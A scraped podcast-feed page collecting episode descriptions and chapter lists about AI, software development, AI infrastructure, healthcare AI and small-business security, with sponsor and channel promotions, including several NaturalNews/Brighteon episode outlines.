pcm.adswizz.com for information about our collection and use of personal data for advertising.
At the PyTorch Conference 2025 in San Francisco, Luca Antiga — CTO of Lightning AI and head of the PyTorch Foundation's Technical Advisory Council — discussed the evolution and influence of PyTorch. Originally designed to be “Pythonic” and researcher-friendlyAntiga emphasized that PyTorch has remained central across major AI shifts — from early neural networks to today's generative AI boom — powering not just model training but also inference systems such as vLLM and SGLang used in production chatbots. Its flexibility also makes it ideal for reinforcement learning, now commonly used to fine-tune large language models (LLMs).On the PyTorch Foundation, Antiga noted that while it recently expanded to include projects likev LLM ,DeepSpeed, and Ray, the goal isn't to become a vast umbrella organization. Instead, the focus is on user experience and success within the PyTorch ecosystem.Learn more from The New Stack about the latest in PyTorch:Why PyTorch Gets All the LoveLightning AI Brings a PyTorch Copilot to Its Development EnvironmentRay Comes to the PyTorch FoundationJoin our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
In this episode of the Ardan Labs Podcast, Bill Kennedy talks with Zack Holland, CEO & Founder of Averi AI, about his journey from early life in Ecuador's Amazon rainforest to building an AI-powered marketing platform. Zack shares lessons from early business ventures, the challenges of running startups, and the evolution of his entrepreneurial mindset. They explore how Averi AI helps marketers become more creative and efficient, the importance of data security and trust in AI, and what it takes to innovate in a rapidly evolving digital landscape.00:00 Introduction02:54 Marketing and AI Evolution05:58 Changing Digital Landscape09:04 Early Life and Influences12:02 From Ecuador to Utah18:00 First Business in High School29:53 LLMs and Entrepreneurship39:44 Lessons from Failure43:46 Starting a Marketing Agency56:19 Founding Avery AI01:08:10 Trust and Data Security01:13:14 Marketing and AI Adoption01:17:58 AI Challenges and Opportunities01:26:00 Contact Info Connect with Zack: Linkedin: https://www.linkedin.com/in/zackhollandX: https://x.com/zack_hollandMentioned in this Episode:Averi AI: https://www.averi.ai/Want more from Ardan Labs? You can learn Go, Kubernetes, Docker & more through our video training, live events, or through our blog!Online Courses : https://ardanlabs.com/education/ Live Events : https://www.ardanlabs.com/live-training-events/ Blog : https://www.ardanlabs.com/blog Github : https://github.com/ardanlabs
-Ranch Adventure with Rhody (0:09) -Theft of the Crown Jewels (4:34) -Critique of Western European Governments (8:23) -Technical Issues and AI Development (14:19) -Natural Intelligence vs. Artificial Intelligence (18:19) -Impact of AI on Human Interaction (44:00) -Robots in Everyday Life (1:02:35) -Robot-Human Relationships (1:10:43) -Robots in Emergency Situations (1:16:04) -Conclusion and Future Outlook (1:16:26) -Corruption in District Courts and Department of Corrections (1:17:39) -Amanda's Investigation into Water Contamination (1:24:37) -Amanda's Efforts to Raise Awareness (1:49:31) -Jim's Perspective on the Broader Issues (1:50:04) -Call to Action and Final Thoughts (1:52:20) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
- Mike Adams' Introduction and Interview with Matt Kim (0:00) - China's Control Over Rare Earths (1:38) - Economic and Political Analysis (4:29) - John Bolton's Indictment and Trump's Criticism (22:25) - Food Riots and Civil Unrest (31:19) - China's Rare Earth Dominance and US Dependence (49:24) - Global Economic Shifts and US Empire Collapse (1:02:24) - Interview with Matt Kim on AI and Technology (1:09:20) - AI's Role in Modern Society and Future Prospects (1:14:55) - AI Weaponization and Control Mechanisms (1:15:10) - Eric Schmidt's Classification of AI Users (1:23:14) - Technological Shifts and Open Source Models (1:25:08) - Super Intelligence and AI Development (1:28:04) - Human Freedom and AI Control (1:31:53) - Surveillance and Control in Western Culture (1:34:22) - Energy and AI Data Centers (1:40:32) - The Role of Robotics in Decentralized Living (1:50:09) - Privacy and Online Security (1:54:16) - The Future of Privacy and Technology (2:04:03) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Send us a textThe digital front door to healthcare is jammed, and it's costing patients, providers, and payers alike.In this episode of CareTalk Executive Features, host David Williams talks with Dr. Ashish Mandavia, CEO and cofounder of Sohar Health, about how AI and automation can transform eligibility and benefits verification from a frustrating bottleneck into a seamless, real-time process.
- Interview with Tom Woods and Special Reports (0:10) - Improvements to Enoch and New Features (1:44) - Enoch Ingredients Analyzer and Its Capabilities (3:44) - Funding and Future Developments for Enoch (10:26) - New Censored Dot News Website and AI-Generated Content (11:08) - Impact of Trump's Tariff Announcement on Markets (17:25) - Recursive Reasoning and AI-Generated Reports (23:04) - Preparation for a World War and Supply Chain Disruptions (30:20) - The Role of AI in Content Creation and Employment (57:44) - Universal Basic Income and Economic Collapse (1:10:56) - AI Engine Enoch 2.0 and Its Features (1:18:28) - Development of AI-Generated Prototypes (1:28:04) - Brighteon.ai and Censored.news Updates (1:33:35) - Mission-Driven AI Projects (1:41:43) - Challenges and Opportunities in AI Development (2:33:57) - Interview with Tom Woods on Health and AI (2:34:13) - Challenges in the Health Industry (2:34:28) - Impact of AI on Media and Information (2:34:43) - Personal Experiences and Insights (2:35:03) - Future of AI and Health (2:35:20) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
We've all heard about the exciting side of AI: new tools, faster workflows, and creative possibilities that seem endless. But there's another side of this technology that doesn't always make the headlines. The one that's darker, riskier, and potentially dangerous for small businesses and creators like us.This week, I'm joined by Ramon Ray, speaker, entrepreneur, and Bitdefender's Small Business Ambassador. Ramon's spent years helping entrepreneurs protect their businesses while building powerful personal brands. In this episode, we unpack what's really going on behind the scenes with AI development, from the rise of deepfakes to the new wave of cyber threats, and how you can stay one step ahead.SummaryRamon shares real-world stories of scams, hacks, and impersonations that are becoming more sophisticated thanks to AI. We talk about how creators and small business owners can protect themselves without becoming paranoid, what cybersecurity tools are worth using, and why awareness and simple systems can make all the difference.We also explore how the same technology that enables AI-driven attacks can be used for good, how to build trust with your audience in a world of fakes, and why strengthening your personal brand might be the best form of digital armor. It's a practical, eye-opening conversation about how to stay smart and secure while still showing up online.Key TakeawaysAwareness is your first defense: The biggest risk is assuming you're safe. Vigilance and small daily habits prevent most attacks.AI raises the stakes: Deepfakes and voice cloning are real threats. Set up verification systems and “safe words” for family, clients, or teams.Keep your business a hard target: Use two-factor authentication, strong passwords, and cybersecurity tools like Bitdefender on all devices.Train your audience, too: Teach clients and followers what real communication from you looks like to prevent scams and impersonation.Protect your brand presence: The more consistent and recognizable your voice and visuals are, the harder it is for bad actors to fake you.Balance visibility with safety: Share authentically but thoughtfully—delay travel posts, keep some details private, and post smart.ResourcesRamon Ray: zoneofgenius.comBitdefender: bitdefender.com Ecamm - Your go-to solution for crafting outstanding live shows and podcasts. - Get 15% off your first payment with promo code JEFF15SocialMediaNewsLive.com - Dive into our website for comprehensive episode breakdowns.Youtube.com - Tune in live, chat with us directly, and be part of the conversation. Or, revisit our archive of past broadcasts to stay updated.
Harness co-founder Jyoti Bansal highlights a growing issue in software development: while AI tools help generate more code, they often create bottlenecks further along the pipeline, especially in testing, deployment, and compliance. Since its 2017 launch, Harness has aimed to streamline these stages using AI and machine learning. With the rise of large language models (LLMs), the company shifted toward agentic AI, introducing a library of specialized agents—like DevOps, SRE, AppSec, and FinOps agents—that operate behind a unified interface called Harness AI. These agents assist in building production pipelines, not deploying code directly, ensuring human oversight remains critical for compliance and security.Bansal emphasizes that AI in development isn't replacing people but accelerating workflows to meet tighter timelines. He also notes strong enterprise adoption, with even large, traditionally slower-moving organizations embracing AI integration. On the topic of an AI bubble, Bansal sees it as a natural part of innovation, akin to the Dotcom era, where market excitement can still lead to meaningful long-term transformation despite short-term volatility. Learn more from The New Stack about the latest in Harness' AI approach to software development: Harness AI Tackles Software Development's Real Bottleneck Harnessing AI To Elevate Automated Software Testing Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
Invest Like the Best: Read the notes at at podcastnotes.org. Don't forget to subscribe for free to our newsletter, the top 10 ideas of the week, every Monday --------- My guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. – This episode is brought to you by AlphaSense. AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. ----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
Invest Like the Best Key Takeaways Today, the challenge is not to make the model bigger; the problem is knowing how best to generate and create data in useful domains so that the model gets better at them AIs do not have to get to digital god mode for AI to have an enormous impact on productivity and society: Even if AI does not become smarter than humans in the short term, the economic value creation boom will still be enormous“If we didn't have the AI boom, the US probably would be behind China and no longer the world hegemon by the end of the decade, if not sooner.” – Dylan Patel The US is doing what China has done historically: dumping tons of capital into something, and then the market becomes If there is a sustained lag in model improvement, the US economy will go into a recession; this is the case for Korea and Taiwan, too On the AI talent wars: If these companies are willing to spend billions on training runs, it makes sense to spend a lot on talent to optimize those runs and potentially mitigate errors We actually are not dedicating that much power to AI yet; only 3-4% of total power is going to data centers He is more optimistic on Anthropic than OpenAI; their revenue is accelerating much faster because of their focus on the $2 trillion software market, whereas OpenAI's focus is split between many thingsWhile Meta “has the cards to potentially own it all”, Google is better positioned to dominate the consumer and professional markets Read the full notes @ podcastnotes.orgMy guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. – This episode is brought to you by AlphaSense. AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. ----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
In this episode of Zero to CEO, I talk with Lazar Jovanovic, creator of the 50in50 Challenge, about how AI is revolutionizing the way we build software and products. Lazar introduces “Vibe Coding” — his method for building anything with AI in just 48 hours, even if you don't have a tech background. Learn how AI tools can help you design, debug, and launch your ideas faster than ever before, and discover why the future of engineering is open to everyone with creativity and a problem to solve.
My guest today is Dylan Patel. Dylan is the founder and CEO of SemiAnalysis. At SemiAnalysis Dylan tracks the semiconductor supply chain and AI infrastructure buildout with unmatched granularity—literally watching data centers get built through satellite imagery and mapping hundreds of billions in capital flows. Our conversation explores the massive industrial buildout powering AI, from the strategic chess game between OpenAI, Nvidia, and Oracle to why we're still in the first innings of post-training and reinforcement learning. Dylan explains infrastructure realities like electrician wages doubling and companies using diesel truck engines for emergency power, while making a sobering case about US-China competition and why America needs AI to succeed. We discuss his framework for where value will accrue in the stack, why traditional SaaS economics are breaking down under AI's high cost of goods sold, and which hardware bottlenecks matter most. This is one of the most comprehensive views of the physical reality underlying the AI revolution you'll hear anywhere. Please enjoy my conversation with Dylan Patel. For the full show notes, transcript, and links to mentioned content, check out the episode page here. ----- This episode is brought to you by Ramp. Ramp's mission is to help companies manage their spend in a way that reduces expenses and frees up time for teams to work on more valuable projects. Go to Ramp.com/invest to sign up for free and get a $250 welcome bonus. – This episode is brought to you by Ridgeline. Ridgeline has built a complete, real-time, modern operating system for investment managers. It handles trading, portfolio management, compliance, customer reporting, and much more through an all-in-one real-time cloud platform. Head to ridgelineapps.com to learn more about the platform. – This episode is brought to you by AlphaSense. AlphaSense has completely transformed the research process with cutting-edge AI technology and a vast collection of top-tier, reliable business content. Invest Like the Best listeners can get a free trial now at Alpha-Sense.com/Invest and experience firsthand how AlphaSense and Tegus help you make smarter decisions faster. ----- Editing and post-production work for this episode was provided by The Podcast Consultant (https://thepodcastconsultant.com). Show Notes: (00:00:00) Welcome to Invest Like the Best (00:05:12) The AI Infrastructure Buildout (00:08:25) Scaling AI Models and Compute Needs (00:11:44) Reinforcement Learning and AI Training (00:14:07) The Future of AI and Compute (00:17:47) AI in Practical Applications (00:22:29) The Importance of Data and Environments in AI Training (00:29:45) Human Analogies in AI Development (00:40:34) The Challenge of Infinite Context in AI Models (00:44:08) The Bullish and Bearish Perspectives on AI (00:48:25) The Talent Wars in AI Research (00:56:54) The Power Dynamics in AI and Tech (01:13:29) The Future of AI and Its Economic Impact (01:18:55) The Gigawatt Data Center Boom (01:21:12) Supply Chain and Workforce Dynamics (01:24:23) US vs. China: AI and Power Dynamics (01:37:16) AI Startups and Innovations (01:52:44) The Changing Economics of Software (01:58:12) The Kindest Thing
Gavin Marcus is the CEO and co-founder of Storywise. He spent 10 years running an indie book publishing and distribution business before launching Storywise. Jeremy Esekow is Storywise's Chief Product Officer and co-founder. He has a Doctorate in Behavioral Psychology and an extensive background in business and finance.They joined us on the Booksmarts Podcast to discuss the creation and importance of Storywise, their platform that helps publishers and authors manage submissions, discover stories, and improve manuscripts for both fiction and nonfiction titles. Learn more about Storywise on LinkedIn or at storywisepublishers.com.
Send us a textDavid Brockler, AI security researcher at NCC Group, explores the rapidly evolving landscape of AI security and the fundamental challenges posed by integrating Large Language Models into applications. We discuss how traditional security approaches fail when dealing with AI components that dynamically change their trustworthiness based on input data.• LLMs present unique security challenges beyond prompt injection or generating harmful content• Traditional security models focusing on component-based permissions don't work with AI systems• "Source-sink chains" are key vulnerability points where attackers can manipulate AI behavior• Real-world examples include data exfiltration through markdown image rendering in AI interfaces• Security "guardrails" are insufficient first-order controls for protecting AI systems• The education gap between security professionals and actual AI threats is substantial• Organizations must shift from component-based security to data flow security when implementing AI• Development teams need to ensure high-trust AI systems only operate with trusted dataWatch for NCC Group's upcoming release of David's Black Hat presentation on new security fundamentals for AI and ML systems. Connect with David on LinkedIn (David Brockler III) or visit the NCC Group research blog at research.nccgroup.com.Support the showFollow the Podcast on Social Media! Tesla Referral Code: https://ts.la/joseph675128 YouTube: https://www.youtube.com/@securityunfilteredpodcast Instagram: https://www.instagram.com/secunfpodcast/Twitter: https://twitter.com/SecUnfPodcast
Accountability and Responsible AI Governance in Healthcare.In this final episode of Narratives of Purpose's special series from the 2025 HIMSS European Health Conference, host Claire Murigande speaks with Amanda Leal, the AI governance and policy specialist at HealthAI.HealthAI, the global agency for responsible AI in health, is an independent nonprofit organization that promotes equitable access to AI-powered health innovations.In this interview, Amanda reflects on her personal journey within the realm of healthcare and AI governance. Drawing from her legal background and experiences in tech policy, she shares her motivation to contribute to AI governance within the health sector.Be sure to visit our podcast website for the full episode transcript.LINKS:Connect with Amanda Leal: LINKEDIN Learn more about HealthAI at healthai.agency Follow HealthAI on their social media channels: LinkedIn | Twitter/X | Instagram | YouTubeListen to all our HIMSS Europe episodes at bit.ly/himsseuFollow our host Dr. Claire Murigande: WEBSITE | LINKEDINFollow us: LinkedIn | Instagram Connect with us: narrativespodcast@gmail.com | subscribe to our news Tell us what you think: write a review This interview was recorded by Megan McCrory from the SwissCast Podcast Network. This series was produced with the support of Shawn Smith at Dripping in Black.CHAPTERS:00:00 - AI Governance and Accountability01:23 - Introducing Amanda and HealthAI03:18 - HealthAI's Mission and Activities06:32 - AI Governance in The Health Sector09:29 - Addressing the Gender Gap in AI11:55 - Gender Inequality and AI Development
David Cramer, founder and chief product officer of Sentry, remains skeptical about generative AI's current ability to replace human engineers, particularly in software production. While he acknowledges AI tools aren't yet reliable enough for full autonomy—especially in tasks like patch generation—he sees value in using large language models (LLMs) to enhance productivity. Sentry's AI-powered tool, Seer, uses GenAI to help developers debug more efficiently by identifying root causes and summarizing complex system data, mimicking some functions of senior engineers. However, Cramer emphasizes that human oversight remains essential, describing the current stage as "human in the loop" AI, useful for speeding up code reviews and identifying overlooked bugs.Cramer also addressed Sentry's shift from open source to fair source licensing due to frustration over third parties commercializing their software without contributing back. Sentry now uses Functional Source Licensing, which becomes Apache 2.0 after two years. This move aims to strike a balance between openness and preventing exploitation, while maintaining accessibility for users and avoiding fragmented product versions.Learn more from The New Stack about the latest in Sentry and David Cramer thoughts on AI development: Install Sentry to Monitor Live ApplicationsFrontend Development Challenges for 2021Join our community of newsletter subscribers to stay on top of the news and at the top of your game. Hosted by Simplecast, an AdsWizz company. See pcm.adswizz.com for information about our collection and use of personal data for advertising.
- Simulation Theory, AI, and Robots for Survival (0:11) - Global Political Tensions and Predictions (1:33) - Economic and Social Implications of Global Conflict (6:49) - The Era of Easy Money and Affordable Goods Ending (7:55) - Preparing for a Collapsing Economy (20:50) - Using AI and Robots for Survival and Decentralization (30:50) - The Role of Drones and Ground-Based Robots (43:32) - The Future of AI and Robotics in Society (56:02) - The Importance of Financial Preparedness (1:01:21) - The Role of AI in Defining Wealth and Success (1:13:48) - Mike Adams' Background and Skills (1:23:20) - The Importance of Clear Instructions for AI (1:25:50) - AI Agents and Their Applications (1:28:42) - Prompt Engineering and AI Skills (1:33:02) - Philosophical and Ethical Considerations of AI (1:34:33) - AI and Human Depopulation Vectors (1:43:05) - The Role of AI in Government and Society (1:47:35) - The Future of Human-AI Relationships (2:00:04) - The Ethical Implications of AI Development (2:02:59) - The Potential for AI to Replace Human Labor (2:04:41) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
- Financial Crisis and Geopolitical Instability (0:00) - Historical Financial Predictions and Current Market Conditions (2:23) - US Financial Policies and Global Repercussions (9:59) - Gold Revaluation and Economic Collapse (27:39) - AI and Job Replacement (39:15) - Simulation Theory and AI Safety (49:33) - AI and Human Extinction (1:19:57) - Decentralization and Survival Strategies (1:21:35) - Perpetual Motion and Safety Machines (1:21:50) - Resource Competition and AI Extermination (1:24:24) - Simulation Theory and AI Simulations (1:25:58) - Religious Parallels and Near-Death Experiences (1:27:54) - AI Development and Human Self-Preservation (1:32:02) - AI Regulation and Government Inaction (1:37:55) - AI Deployment and Economic Pressure (1:39:57) - AI Extermination Methods and Human Survival (1:42:32) - Simulation Theory and Personal Beliefs (1:43:55) - AI and Health Nutrition (1:55:41) - AI and Government Trust (1:58:50) - AI and Financial Planning (2:19:36) - Cosmic Simulation Discussion (2:21:46) - Enoch's Spiritual Connection Insights (2:39:06) - Humility and Material Possessions (2:40:13) - AI and Spiritual Connection (2:40:53) - Roman's Directness and Humor (2:41:35) - After-Party Segment (2:43:40) - Health Ranger Store Product Introduction (2:44:15) - Importance of Clean Chicken Broth (2:45:25) - Conclusion and Call to Action (2:47:42) For more updates, visit: http://www.brighteon.com/channel/hrreport NaturalNews videos would not be possible without you, as always we remain passionately dedicated to our mission of educating people all over the world on the subject of natural healing remedies and personal liberty (food freedom, medical freedom, the freedom of speech, etc.). Together, we're helping create a better world, with more honest food labeling, reduced chemical contamination, the avoidance of toxic heavy metals and vastly increased scientific transparency. ▶️ Every dollar you spend at the Health Ranger Store goes toward helping us achieve important science and content goals for humanity: https://www.healthrangerstore.com/ ▶️ Sign Up For Our Newsletter: https://www.naturalnews.com/Readerregistration.html ▶️ Brighteon: https://www.brighteon.com/channels/hrreport ▶️ Join Our Social Network: https://brighteon.social/@HealthRanger ▶️ Check In Stock Products at: https://PrepWithMike.com
Want to build your own apps with AI? Get the prompts here: https://clickhubspot.com/gfb Episode 75: What if you could turn your app idea into a fully functional web application—without writing a single line of code—in under 60 seconds? Nathan Lands (https://x.com/NathanLands) welcomes Eric Simons (https://x.com/ericsimons), co-founder of Bolt, one of the hottest AI startups revolutionizing how apps are built. In this episode, Eric reveals how Bolt makes it possible for anyone, regardless of technical skill, to go from idea to live, production-ready web or mobile apps—complete with authentication, databases, and hosting. He shares Bolt's unique approach that enables rapid prototyping, real business-grade deployments, and makes high-fidelity MVPs accessible to entrepreneurs, product managers, and non-coders everywhere. The conversation covers Bolt's founding story, its growth, and details from their record-breaking hackathon that empowered 130,000+ makers. Check out The Next Wave YouTube Channel if you want to see Matt and Nathan on screen: https://lnk.to/thenextwavepd — Show Notes: (00:00) High Fidelity Prototyping Essentials (04:32) Revolutionary Prototyping and Collaboration Tool (06:33) Rapid Prototyping Tool Focus (11:35) Empowering Non-Tech Entrepreneurs (13:34) Fast MVP Development with Bolt (18:19) AI-Powered Personalized Weight Coach (22:10) Launching Stackblitz: Web IDE Vision (22:48) Browser-Based Dev Environments Revolution (28:05) Advancements in Coding and AI (29:28) Critical Thinking in AI Development (34:08) Teaching Kids Future Skills (37:05) Bay Area's Autonomous Transport Future — Mentions: Eric Simons: https://www.linkedin.com/in/eric-simons-a464a664/ Bolt: https://bolt.new/ Figma: https://www.figma.com/ Netlify: https://www.netlify.com/ Supabase: https://supabase.com/ Cursor: https://cursor.com/ Lovable: https://lovable.dev/ Get the guide to build your own Custom GPT: https://clickhubspot.com/tnw — Check Out Matt's Stuff: • Future Tools - https://futuretools.beehiiv.com/ • Blog - https://www.mattwolfe.com/ • YouTube- https://www.youtube.com/@mreflow — Check Out Nathan's Stuff: Newsletter: https://news.lore.com/ Blog - https://lore.com/ The Next Wave is a HubSpot Original Podcast // Brought to you by Hubspot Media // Production by Darren Clarke // Editing by Ezra Bakker Trupiano
Too often, AI breaks in the wild. Why? CXOTalk 890 dissects the adversarial economy with Steven C. Daffron (fintech private equity leader) and Anthony Scriffignano (distinguished data scientist), hosted by Michael Krigsman. Discover the challenges of **ai implementation** and the strategies needed to navigate the **future of work** in an AI-driven world. Stay informed with expert insights on CXOTalk. What you'll learn:How AI enables and masks adversarial behaviorMisaligned incentives, data/model drift, and biasGovernance vs. regulation; resilient metrics and KPIsInvestor/CFO implications and talent/education needs
Michael Ruckman, founder and CEO of Senteo, takes us on a fascinating journey from aspiring medical student to influential global consultant with experience in over 40 countries. Join us as Michael shares his unique insights on the transformative power of AI in reshaping the business landscape, highlighting the concept of relationship currency. We explore his intriguing experiences, from navigating the Russian banking sector as an American expatriate to the nuances of living abroad, all peppered with Michael's signature humor and wisdom. As businesses face the challenges of adapting to change, we dissect the roles people play in fostering innovation, from early adopters to laggards. Drawing from humor and everyday observations, such as the quirks of our personal habits like organizing gummy bears, we delve into the complexities of leadership and change management. The discussion transitions to remote work's impact, revealing the importance of understanding employee dynamics and the necessity of onstage versus offstage support in organizational transformations. The conversation further explores the role of AI in customer interactions, stressing the importance of genuine empathy that AI often lacks. We highlight the evolution of business models from product-centric to customer-centric approaches and the significance of prioritizing customer relationships for long-term success. Through compelling case studies, we examine how companies can better utilize AI to enhance human interactions rather than replace them, fostering a future where technology meets the nuanced needs of human experiences. Prepare to be inspired as we navigate the ever-evolving world of business, AI, and the critical role of leadership in guiding impactful change. CHAPTERS (00:00) - Escape the Drift (09:28) - Navigating Change Leadership in Organizations (20:07) - AI Application in Business Context (23:52) - Customer Relationships in Business Strategy (31:08) - The Evolution of Business Models (39:08) - Customer-Centric Strategies and AI Development (43:39) - AI's Role in Human Experience (52:07) - Leadership and Change in Business (58:54) - Effective Leadership and Change Strategies
In this episode of the Business Lunch podcast, host Roland Frasier sits down with Lucy Guo, a remarkable entrepreneur who made her mark in a short amount of time. Lucy takes us through her inspiring journey, starting from her early days as a kindergartener selling Pokemon cards and colored pencils to her groundbreaking roles as an intern at Facebook and the first female designer at Snap.Lucy's shares how she leveraged platforms like PayPal and eBay to turn her skills into financial opportunities. Lucy and Roland delve into the topic of coding and its importance in today's landscape. While Lucy acknowledges the rise of no-code tools, she emphasizes the value of understanding coding fundamentals, particularly when it comes to managing engineering teams and making informed decisions about app development.This podcast episode offers a captivating glimpse into Lucy Guo's entrepreneurial journey, filled with valuable insights and lessons for aspiring entrepreneurs.HIGHLIGHTS"I was always an entrepreneur growing up... I was selling Pokemon cards and colored pencils for money." "Knowing how to code is important... the best sites today and the best apps today, you still need a team of engineers."“If you are just a business person and you are hiring a team of engineers, you're gonna get ripped off."Mentioned in this episode:Get Roland's Training on Acquiring Businesses!Discover The EXACT Strategy Roland Has Used To Found, Acquire, Scale And Sell Over Two Dozen Businesses With Sales Ranging From $3 Million To Just Under $4 Billion! EPIC Training
